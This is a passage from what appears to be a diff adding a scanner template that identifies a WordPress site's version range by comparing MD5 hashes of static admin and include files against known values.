"(\"2d54476191767139e8ae7aaef8b3653f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.js" + matchers: + - type: dsl + name: 4.7 - 4.9.5 + dsl: + - "(\"410fd99a0aca02dcf6abda8b98222d99\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f973910442293f747aedd8df81542222\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2113b842b04cb770f09f80b71b35bd41\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c660f729afcf0339a26ad7cee25eb45b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b30a814a7fa9ea4b03498d7f4d8e3b2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"995f94db4b9e67b27b3d71ca72624988\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"24daf495d09243fe7a3eb040d58ddcc7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d4beb52b277333b38bf53fa07309f192\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"871f0866df7ba56493e97a1a21b82b53\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6578ae8741421df2c6b352f92684140d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"8bba20755890a66db03ed0d606e17c4c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"3149dd38216585bd7d68e89da427cfb0\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"7270887faa737b6ab4012ae16e0d2ecf\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"455d1a15d2c2112242449ce6edb5ac14\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"8cb6604046ddf6f3ef9d6e1fcddd31c1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"b18907877b011f5bbbdb949f75a3dd75\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c4daaa511f44a2df4ab86fce49eff839\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"890af0a8978150a6838937100d90e489\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f00c5d495a40b9be6deb67c4c2ea8e74\" == md5(body))" + - type: dsl + name: 3.0.5 - 3.0.6 + dsl: + - "(\"0cefbed58bc2260d2f92560d50cee967\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.4 + dsl: + - "(\"b38b6b854829c6a3cde9450b0820feaa\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"c7229ea07e54d5a7a4f6eb5627e690de\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"88ce6f35b60890ede66b1ca4c39fc4af\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"e4f0fc3a74331d7d2060914068300ec0\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"bf5e7f1eebeddfa5b0e217bd868cd623\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2fbacf0ddb5f88b962c3a1dbda73ca10\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a34f1474e3a5ade6b4483bc307bfde84\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"020069f33ed66ea68f9067c596d137cb\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"c80252996072ccb0aa20eb24bfc388e8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"49b375e4fe6862c7d6b5445796fc11a5\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"9b5f5cfd0d4a6bb9104ba13a987f1616\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.3.6 + dsl: + - "(\"086a6977f592c2c633281623697b9c89\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b2b269b59688458f3be7720f258419d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"23b646facdd6a9aa3e8a79809a0d4287\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"acee57a19cda70bf397555354cb1c128\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d5b03f5ca13605379b6c565ebfa55570\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"eeae1118610e5531c31ba2bcb9307e53\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"7f1d9aa97951aa4ef795807cacd48ed8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2b678b0930558d9605a9126e3e1e2aad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dcd4d53323e183c283c45480f37272f0\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8df6a448a11dc26010e5e58ffd258ff3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"bce0fcfa6d2d6f3e058c71e5830617ae\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"61c6df5b1e3a5cf6ebd565cb58f91e6e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"18bff3de0535b966f8d7304edae11046\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"ca91741630f5a7f59a741e9f8b80f426\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"1c060d191ff63e841d8f72eacaf4a6bf\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"07e615ff39dbb16e59116aeff6905b43\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"f1ad6ac5d3f3f0ad4d5865c8b3e60195\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"1e949d2c91490fed06cb0b747b913872\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"190b8b303e731c8f9a6174f994b4b8ec\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"26c698cf4308f7411829719c0092e3ba\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"f928859bbdce98c97c2c54a4866fd298\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"d93f9684a688e6b333732fc96a73ccd3\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"34785c29f6816b0e2def5d1425d684a4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"e68c7549dca30ee2b36ec0e3eb6f60db\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c1990e08d992a070008e812fd3431aa7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"182c51951e8c1266613ae4932d3bec01\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"ebc3225a9e7f4673168062c05bed5c71\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7225426df452ba57c476c9c185a39884\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"823eee9bf2f9fac24c84264408bd143c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f4cc8a85c30c26c493d9529dce507e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3027a880d7e45acd4aacde8b90570904\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"d3c3fcc9f814d55d40f611bf5680e0b6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e8fe2ba8fb7d0d6cfe0251cb256b30e7\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a8b46397a7fedad016bf5bbb35e65e78\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"980373b7e45d9657f82af1dbc31be9e9\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ebb761dcfd6cb62a9983a41f6c69266a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"07decee960d22fca5b6e94eaa647956e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"604d702e0a430f86e7bcb8b21279b43a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"699d46e0f1942549db67dfc2d3331ac7\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"059696f05866c8f228b4180b3e883a25\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13a3866b367a914f06e876ce28a0c2df\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"6f15ff7135a5d85a53cdbd4631b6f575\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"81238c176822f1efd9d121eea5fbb3d7\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"9051793fd0506aa6b1b6a0247ea9794c\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"e1532114021a77a683c7415ec4e29db3\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"7119570d5ac7ab433dfc47504ba63306\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"96d44cd1c8b67c6c75fe69ca710f13e1\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"513061f4002f58bdf2078417a6a2de0c\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b4dcdb2ce9b2b421061b957711fcc5ef\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"8d8a310e7026d8f2e85d1ca298e847df\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"09cbf2e1b4d252605942102d50fc8669\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"5f811fc388851e1e47ec039e88788e46\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bb6cb59535e109ed4b6114e8fbf9a6b3\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"b125dfd27dc6d691dec23472c501f331\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"efe7d56a14eb97150e1b3895ff0912aa\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3a6681edc6beee72f24052981ffa455c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bd5147b8b23d61b9c5eb0291f6ef5882\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f2f1451cae3fbd07ed005df071713499\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0afe92ecadd20642405e068c198d81e5\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"6f48ef6a45393efdfdfbe8f8ed6a2506\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"66ea900f920a0f7b94920ef018724264\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5ba4e14b2d9cb19fb65b7cfa7fb5b9aa\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"617d5f0599c159412e1a3421d703f703\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9eebc5ec4f78378537ea76f5ada4ea51\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"418e0259481989778b697f1a65f49a66\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"712664ed4085240ed13d04f257c48cf8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"be99c57389c7d414f0f58f33678a0824\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1feb400a4e9983895a55cf7aa0078b07\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"fc68bb88fbe1970c5f2c6ba9381896e4\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"2d5e5d35c3f1046f92c6bd0c3ad5e2be\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d96ee1aa49292d90a5d085764b1d33db\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"e824bb32e5294e03b23fdb2bc0ce2fcf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"ac500823d8fc685bc093f052adf69020\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ef08248e4b4503b682c13cded1b0647a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0b55e6d96f87a218a1000470861c01bb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"77740c8d0bc7f991d1d8b32bde522ad8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"b887a122adf7d35bc22e326f1d81dae2\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"6303281815f53c3c71c82bc776df6dc8\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"89ecbd877f22c7a4c4957d57fd27af25\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"aae0e1432448480894bf46b4af05127e\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"9aa9e8812ca07ae32b1a696c9eeb8f9b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1881393ac48ad40d1afcdf7a9f25c8ef\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c457a0d561db7907bb16385e74bc2167\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"120fb112fa760baf693787a8bb8e0d16\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"0902edb1b33e62df3b89e42ee0fb9284\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"38a79bf55e7a3b6ccba3b242e9b2de00\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"55238fac829b69520b226a3e70639cbc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"216986c56836217f278adc7452762759\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8c078f5f2fb09c39160fc5097196f668\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6292dae0a22fbb3114f650ad14eb0633\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"cf0e90a5b0c60c057ee531590e2a1ea5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dca1f2c9b549b0c85b279a27e4adc142\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4f2215bdabcb2b4b32f3e62f1c913b12\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"54fc1f4a96ac646bf7c4a971e786d3cb\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"3260d285fda6904e237707fae35f2a5c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"8ac09095ebcc8c9ffcf6593c6f4118f7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"520f38940371585ea1be3adbe7ff9d37\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"a1c1f8d9141979d6cec1eb4e73e49ad1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6bbb337fa6d1a1f211d0886806b10974\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"857ee04675bddc934ddeea341b86c976\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f082f7c7ff8deaf5e3ddbc77b37c6396\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d86c1fb98ee6afdd746b95f4346347c6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"f7c7964c2816428bf5404d506720cf67\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"dd14a6b9955fc92fab88fcbc6514925d\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"2e3fc0eacf4c93d49e1c6a1b2e6778f8\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"0b4b9fa4c732d440c63e7a7c292c67e5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"11eebad835b22f5e58524a023f7202ac\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2469caff3076ab9a6f6e27d191a5ff39\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-nav-menus.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"adc6503f011d23207fefb4ba2aefeb24\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"2ab2b22000b57942c42134efe73db683\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"38f10b79fbbffc9e741893014ea002b4\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"ecb1fddddee46cdebda2a0421aadeb63\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"676f559c24dcc8691869e86be3cf72c0\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"bc754d8cb65e8b7cb92f6ec38f5b3632\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"db180e593c9cf471de955acaeeeab54a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bbf4734a3338cf875235a5ada02c41b4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7299c58bcace8ce8a56b057b4656bc75\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"0bc26c3f8248b01d3431b73ac6d886a7\" == md5(body))" + - type: dsl + name: 4.3.1 + dsl: + - "(\"b19dec30505b46afbc06a72e9fc175e6\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"0495076f6aad785775658ecdfd5e939e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"c823f128adf2d3634b7d3ff5ebec04fe\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"b6bd555ecefea0378f027c9441a243e3\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"eaeb1c4c7104fb2fb2ac3fbd22a665b5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"ac8716e6b7dfb4c763f73c94cb94a597\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e099bc0d6b8f5ec1bbe943f308e658a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"465011bcb652bfa98c9b63d205eb5273\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a1cc633332ed9f999720fe73d910315b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-nav-menus.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ab9e3ae2d4e5b67fa155e62311987bea\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"62c76211a81251e495b11d23314da878\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"dc3b7e6bb1b67c77a8259d19df7eb7b1\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"f09d815335cd77c8c7777b2824254c07\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"9b6fd3900a2dd88c4de0e4655f362cb3\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"444b2358c6ad5e0be84b367b2e080a0f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"8984e47a6836e5b0fdb5e89049bb8084\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"852fe74d1ce464ec9e621e10e52428e8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"47e3575662370328eff294a91679a15f\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"b06763f8894176006633b67282d417ab\" == md5(body))" + - type: dsl + name: 4.3.1 + dsl: + - "(\"12a53b2080fee745c366799d75f36e49\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"eb8b822276e2dbfbc687a78ad65253dc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"abeadaf293f7a753b3f000b21513fbbd\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"b398320f5969c1c95bbf52ef6edf95ec\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"761a86bbff4239fc775162efb53fb2fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"dab7c6fe47ffeebdd90036c2615fe84f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"3eeb230682665e3b3f0ec4752747c176\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"aff331bc7e43fdefe81544ce420ce9b3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a6ffef157a167b4fdf103bbd0418711e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"46fe96ba671876ce0808b48f733e19c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"52984e805a29165946383973e8551d5b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"76dd539631f379ca702e9757f52a53f3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"7d9001aa245e6004270b0389a945df88\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ba5d55100eab7af70a53164d5f2653b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b8e891a43bc75441f6fbcec79f8c4793\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3b39195b45bf3dfd8fd9f1a0b0b70c3c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cad7dada660b400f74333b7c98413dd4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1e33af23a168b21a333bf6ba71ac4671\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d0af21973275bb0564f8d1525e0d325e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a7a6f1bc16e1f5c9bdd1b08d95151d11\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1c23a8dfcb49c96745ab5a40854041ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"952c6da3495a55b489c237b8552fd666\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8d7e42146c845324eb5781a7a985dee0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c8d76423399c96a70dedb4fb51435fc8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"bb72ad210956d7f1e6889dd89fea310f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7d816fc5436c48453c18a5b14be80f3a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"850b8a19ced6f9abaff2d890cae5611e\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"94db0977de867d05ca85e61a43580bbd\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fe28c98656cdf515c7c6aa9de76da805\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"60f588936c53c1a1c4e545dd806a522f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"40f8ea7fd6fe99ea9ebf66ae9af50166\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"151b124e7cdd860734a5258c5b38abb4\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"b7c4a02b55be88d7bd743618b473a7ec\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"e46522d1a0b234fb177f8b328120fbe2\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"2a63ff20dac8b1a01f68f8874e4e3de5\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4ec7288450a487a7c228d7e09a25dba6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"62fceaa11574bf917cbfaed196374da7\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"ed089860adc11ffbace721ab647297d1\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e086a26a0c57fde0e82d1b600b6b8df9\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f34b196dd1411f3ab1cd1b9f284f02d5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"84801b81cf2cc9b89a0523225beaa6e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"335282bb7efb5b07951afe0a0639d66b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/rtl.css" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"abc1ae8e44b7b7820714416b155b9400\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"395db168cd1238d99584184ead0b324e\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"545758c52dbfa268fbebcf30daff4b4e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cf6bb826f170ceacd93cd4cb2cfd4661\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"2768e4099588e3689883dd201bd130d2\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ec098e76667af2ccd9a02f31f02fe270\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a805b001e7833d4e798ce5e53de34695\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c3316d03e21caf854e9a27df34025d0a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"27166e3aa9fddf13dacef61f3154b99e\" == md5(body))" + - type: dsl + name: 2.2.3 + dsl: + - "(\"26fb3af4670b564efdefbf845d84266b\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.2 + dsl: + - "(\"ae64aa5c96bfecff5fda7ba51221c20b\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"94385d725a8f9a6292ed4ef9856b2d24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-fresh.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c4b004c430b5ef1d2bacd01b098e4a60\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ddf28ae11a49d546f52237a16604d024\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"378399e10bdc7cd9a25e8e80e909a545\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"501b29f8b4acb2f1209a2c69c97f9435\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"85f468b9ada7919c4a9b4411eaf19741\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8f7250aa912e64836b464e870274f8c3\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a4f330ffa223e2629ea55241d5e7528f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"7103571c7f13000d5f8a5b3e335455c8\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - 